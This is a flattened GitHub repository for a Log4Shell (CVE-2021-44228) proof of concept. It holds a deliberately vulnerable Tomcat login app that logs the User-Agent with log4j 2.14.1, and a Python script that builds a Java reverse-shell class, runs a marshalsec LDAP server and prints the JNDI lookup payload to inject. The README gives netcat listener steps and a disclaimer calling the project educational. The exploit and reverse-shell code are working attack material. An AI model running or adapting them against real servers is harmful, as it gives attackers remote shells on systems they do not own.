├── .gitignore ├── Dockerfile ├── README.md ├── poc.py ├── requirements.txt ├── target ├── log4shell-1.0-SNAPSHOT.war └── marshalsec-0.0.3-SNAPSHOT-all.jar └── vulnerable-application ├── .gitignore ├── .idea ├── .gitignore ├── artifacts │ ├── log4shell_war.xml │ └── log4shell_war_exploded.xml ├── compiler.xml ├── encodings.xml ├── jarRepositories.xml ├── libraries │ ├── Maven__com_sun_deploy_1_8.xml │ ├── Maven__javax_servlet_javax_servlet_api_4_0_1.xml │ ├── Maven__org_apache_logging_log4j_log4j_api_2_14_1.xml │ ├── Maven__org_apache_logging_log4j_log4j_core_2_14_1.xml │ ├── Maven__org_apiguardian_apiguardian_api_1_1_0.xml │ ├── Maven__org_junit_jupiter_junit_jupiter_api_5_7_1.xml │ ├── Maven__org_junit_jupiter_junit_jupiter_engine_5_7_1.xml │ ├── Maven__org_junit_platform_junit_platform_commons_1_7_1.xml │ ├── Maven__org_junit_platform_junit_platform_engine_1_7_1.xml │ └── Maven__org_opentest4j_opentest4j_1_2_0.xml ├── misc.xml ├── modules.xml ├── runConfigurations │ └── Tomcat_7_0_94.xml ├── uiDesigner.xml └── vcs.xml ├── log4shell.iml ├── pom.xml └── src └── main ├── java └── com │ └── example │ └── log4shell │ ├── LoginServlet.java │ └── log4j.java └── webapp ├── WEB-INF └── web.xml └── index.jsp /.gitignore: -------------------------------------------------------------------------------- 1 | jdk1.8.0_20/ 2 | Exploit.* 3 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tomcat:8.0.36-jre8 2 | 3 | RUN rm -rf /usr/local/tomcat/webapps/* 4 | ADD target/log4shell-1.0-SNAPSHOT.war /usr/local/tomcat/webapps/ROOT.war 5 | EXPOSE 8080 6 | CMD ["catalina.sh", "run"] 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell Vulnerable WebApp PoC 2 | A Proof-Of-Concept vulnerable web application for the [Log4J vulnerability]() (CVE-2021-44228), based off [Kozmer's Log4Shell POC](). This simple fork allows a web browser's User Agent to be logged when the site is visited.

3 | Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others. 4 | 5 | In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it. 6 | 7 | 8 | A video showing the exploitation process 9 | ---------------------------------------- 10 | 11 | Vuln Web App: 12 | 13 | https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4 14 | 15 |
16 | 17 | Ghidra (Old script): 18 | 19 | https://user-images.githubusercontent.com/87979263/145728478-b4686da9-17d0-4511-be74-c6e6fff97740.mp4 20 | 21 |
22 | 23 | Minecraft PoC (Old script): 24 | 25 | https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4 26 | 27 | 28 | Proof-of-concept (POC) 29 | ---------------------- 30 | 31 | As a PoC we have created a python file that automates the process. 32 | 33 | 34 | #### Requirements: 35 | ```bash 36 | pip install -r requirements.txt 37 | ``` 38 | #### Usage: 39 | 40 | 41 | * Start a netcat listener to accept reverse shell connection.
42 | ```py 43 | nc -lvnp 9001 44 | ``` 45 | * Launch the exploit.
46 | **Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory. 47 | ```py 48 | $ python3 poc.py --userip localhost --webport 8000 --lport 9001 49 | 50 | [!] CVE: CVE-2021-44228 51 | [!] Github repo: https://github.com/kozmer/log4j-shell-poc 52 | 53 | [+] Exploit java class created success 54 | [+] Setting up fake LDAP server 55 | 56 | [+] Send me: ${jndi:ldap://localhost:1389/a} 57 | 58 | Listening on 0.0.0.0:1389 59 | ``` 60 | 61 | This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport. 62 | 63 |
64 | 65 | 66 | Our vulnerable application 67 | -------------------------- 68 | 69 | We have added a Dockerfile with the vulnerable webapp. You can use this by following the steps below: 70 | ```c 71 | 1: docker build -t log4j-shell-poc . 72 | 2: docker run --network host log4j-shell-poc 73 | ``` 74 | Once it is running, you can access it on localhost:8080 75 | 76 | If you would like to further develop the project you can use Intellij IDE which we used to develop the project. We have also included a `.idea` folder where we have configuration files which make the job a bit easier. You can probably also use other IDE's too. 77 | 78 |
79 | 80 | Getting the Java version. 81 | -------------------------------------- 82 | 83 | At the time of creating the exploit we were unsure of exactly which versions of java work and which don't so chose to work with one of the earliest versions of java 8: `java-8u20`. 84 | 85 | Oracle thankfully provides an archive for all previous java versions:
86 | [https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).
87 | Scroll down to `8u20` and download the appropriate files for your operating system and hardware. 88 | ![Screenshot from 2021-12-11 00-09-25](https://user-images.githubusercontent.com/46561460/145655967-b5808b9f-d919-476f-9cbc-ed9eaff51585.png) 89 | 90 | **Note:** You do need to make an account to be able to download the package. 91 | 92 | Once you have downloaded and extracted the archive, you can find `java` and a few related binaries in `jdk1.8.0_20/bin`.
93 | **Note:** Please make sure to extract the jdk folder into this repository with the same name in order for it to work. 94 | 95 | ``` 96 | ❯ tar -xf jdk-8u20-linux-x64.tar.gz 97 | 98 | ❯ ./jdk1.8.0_20/bin/java -version 99 | java version "1.8.0_20" 100 | Java(TM) SE Runtime Environment (build 1.8.0_20-b26) 101 | Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode) 102 | ``` 103 | 104 | Disclaimer 105 | ---------- 106 | This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this awesome vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: [https://log4shell.tools/](https://log4shell.tools/)). 107 | 108 | Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it. 109 | 110 | -------------------------------------------------------------------------------- /poc.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import os 3 | import sys 4 | 5 | javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version']) #stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) 6 | print("\n") 7 | 8 | userip = input("[+] Enter IP for LDAPRefServer & Shell: ") 9 | userport = input("[+] Enter listener port for LDAPRefServer: ") 10 | lport = input("[+] Set listener port for shell: ") 11 | 12 | def payload(): 13 | 14 | javapayload = (""" 15 | 16 | import java.io.IOException; 17 | import java.io.InputStream; 18 | import java.io.OutputStream; 19 | import java.net.Socket; 20 | import java.io.FileWriter; // Import the FileWriter class 21 | import java.io.IOException; // Import the IOException class to handle errors 22 | 23 | 24 | public class Exploit { 25 | 26 | public Exploit() throws Exception { 27 | try { 28 | FileWriter myWriter = new FileWriter("filename.txt"); 29 | myWriter.write("Files in Java might be tricky, but it is fun enough!"); 30 | myWriter.close(); 31 | System.out.println("Successfully wrote to the file."); 32 | } catch (IOException e) { 33 | System.out.println("An error occurred."); 34 | e.printStackTrace(); 35 | } 36 | String host="%s"; 37 | int port=%s; 38 | String cmd="/bin/sh"; 39 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); 40 | Socket s=new Socket(host,port); 41 | InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); 42 | OutputStream po=p.getOutputStream(),so=s.getOutputStream(); 43 | // so.write("test"); 44 | while(!s.isClosed()) { 45 | while(pi.available()>0) 46 | so.write(pi.read()); 47 | while(pe.available()>0) 48 | so.write(pe.read()); 49 | while(si.available()>0) 50 | po.write(si.read()); 51 | so.flush(); 52 | po.flush(); 53 | Thread.sleep(50); 54 | try { 55 | p.exitValue(); 56 | break; 57 | } 58 | catch (Exception e){ 59 | } 60 | }; 61 | p.destroy(); 62 | s.close(); 63 | } 64 | } 65 | 66 | """) % (userip,lport) 67 | 68 | f = open("Exploit.java", "w") 69 | f.write(javapayload) 70 | f.close() 71 | 72 | os.system('./jdk1.8.0_20/bin/javac Exploit.java') 73 | import subprocess 74 | subprocess.Popen("/bin/sh | nc localhost 9001", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 75 | #os.spawnl(os.P_DETACH, '/bin/sh | nc localhost 9001') 76 | sendme = ("${jndi:ldap://%s:1389/a}") % (userip) 77 | print("[+] Send me: "+sendme+"\n") 78 | 79 | def marshalsec(): 80 | os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://{}:{}/#Exploit".format(userip, userport)) 81 | 82 | if __name__== "__main__": 83 | payload() 84 | marshalsec() 85 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | colorama 2 | argparse 3 | -------------------------------------------------------------------------------- /target/log4shell-1.0-SNAPSHOT.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexLynd/log4j-shell-poc/7ac7b6b3bbddecd8aafc0f95c61cc80d73d2357d/target/log4shell-1.0-SNAPSHOT.war -------------------------------------------------------------------------------- /target/marshalsec-0.0.3-SNAPSHOT-all.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexLynd/log4j-shell-poc/7ac7b6b3bbddecd8aafc0f95c61cc80d73d2357d/target/marshalsec-0.0.3-SNAPSHOT-all.jar -------------------------------------------------------------------------------- /vulnerable-application/.gitignore: -------------------------------------------------------------------------------- 1 | target/* -------------------------------------------------------------------------------- /vulnerable-application/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/artifacts/log4shell_war.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/target 4 | 5 | 6 | false 7 | log4shell 8 | war 9 | false 10 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/artifacts/log4shell_war_exploded.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/target/log4shell-1.0-SNAPSHOT 4 | 5 | 6 | true 7 | log4shell 8 | war 9 | false 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/jarRepositories.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 14 | 15 | 19 | 20 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__com_sun_deploy_1_8.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__javax_servlet_javax_servlet_api_4_0_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_apache_logging_log4j_log4j_api_2_14_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_apache_logging_log4j_log4j_core_2_14_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_apiguardian_apiguardian_api_1_1_0.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_junit_jupiter_junit_jupiter_api_5_7_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_junit_jupiter_junit_jupiter_engine_5_7_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_junit_platform_junit_platform_commons_1_7_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_junit_platform_junit_platform_engine_1_7_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/libraries/Maven__org_opentest4j_opentest4j_1_2_0.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/runConfigurations/Tomcat_7_0_94.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 89 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /vulnerable-application/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /vulnerable-application/log4shell.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /vulnerable-application/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | com.example 8 | log4shell 9 | 1.0-SNAPSHOT 10 | log4shell 11 | war 12 | 13 | 14 | UTF-8 15 | 1.8 16 | 1.8 17 | 5.7.1 18 | 19 | 20 | 21 | 22 | javax.servlet 23 | javax.servlet-api 24 | 4.0.1 25 | provided 26 | 27 | 28 | org.junit.jupiter 29 | junit-jupiter-api 30 | ${junit.version} 31 | test 32 | 33 | 34 | org.junit.jupiter 35 | junit-jupiter-engine 36 | ${junit.version} 37 | test 38 | 39 | 40 | 41 | 42 | 43 | org.apache.logging.log4j 44 | log4j-core 45 | 2.14.1 46 | 47 | 48 | 49 | org.apache.logging.log4j 50 | log4j-api 51 | 2.14.1 52 | 53 | 54 | 55 | 56 | com.sun 57 | deploy 58 | 59 | 1.8 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | org.apache.maven.plugins 71 | maven-war-plugin 72 | 3.3.1 73 | 74 | 75 | 76 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /vulnerable-application/src/main/java/com/example/log4shell/LoginServlet.java: -------------------------------------------------------------------------------- 1 | package com.example.log4shell; 2 | 3 | import java.io.*; 4 | import javax.servlet.ServletException; 5 | import javax.servlet.http.*; 6 | import javax.servlet.annotation.*; 7 | 8 | import com.sun.deploy.net.HttpRequest; 9 | import org.apache.logging.log4j.LogManager; 10 | import org.apache.logging.log4j.Logger; 11 | 12 | 13 | @WebServlet(name = "loginServlet", value = "/login") 14 | public class LoginServlet extends HttpServlet { 15 | 16 | @Override 17 | protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { 18 | String userAgent = req.getHeader("user-agent"); 19 | String userName = req.getParameter("uname"); 20 | String password = req.getParameter("password"); 21 | 22 | resp.setContentType("text/html"); 23 | PrintWriter out = resp.getWriter(); 24 | out.println(""); 25 | 26 | if(userName.equals("admin") && password.equals("password")){ 27 | out.println("Welcome Back Admin!"); 28 | } 29 | else { 30 | // vulnerable code 31 | Logger logger = LogManager.getLogger(com.example.log4shell.log4j.class); 32 | logger.error(userAgent); // log browser user agent! 33 | // logger.error(userName); // log username instead 34 | 35 | out.println(" Ur user agent has been logged loser >:P "); 36 | } 37 | } 38 | 39 | public void destroy() { 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /vulnerable-application/src/main/java/com/example/log4shell/log4j.java: -------------------------------------------------------------------------------- 1 | package com.example.log4shell; 2 | 3 | import org.apache.logging.log4j.LogManager; 4 | import org.apache.logging.log4j.Logger; 5 | 6 | public class log4j { 7 | private static final Logger logger = LogManager.getLogger(log4j.class); 8 | 9 | } 10 | -------------------------------------------------------------------------------- /vulnerable-application/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | -------------------------------------------------------------------------------- /vulnerable-application/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
11 |
12 |
13 |

GoFinance

14 |

The most popular peer to peer lending at SEA

15 | 16 |
17 |
18 |
19 |
20 |

Hello Again!

21 |

Welcome Back

22 |
23 | 24 | 25 | 26 | 27 |
28 |
29 | 30 | 31 | 32 | 33 |
34 | 35 | Forgot Password ? 36 |
37 |
38 |
39 | 40 | 41 | --------------------------------------------------------------------------------